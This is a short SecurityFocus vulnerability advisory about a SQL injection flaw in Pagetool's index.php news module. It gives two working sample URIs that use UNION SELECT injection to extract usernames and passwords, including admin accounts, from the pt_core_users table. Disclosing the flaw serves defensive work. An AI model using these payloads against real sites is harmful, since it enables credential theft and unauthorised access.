Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Pagetool Index.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

A sample URI has been provided:

http://www.example.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1

http://www.example.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*







 

Privacy Statement
Copyright 2009, SecurityFocus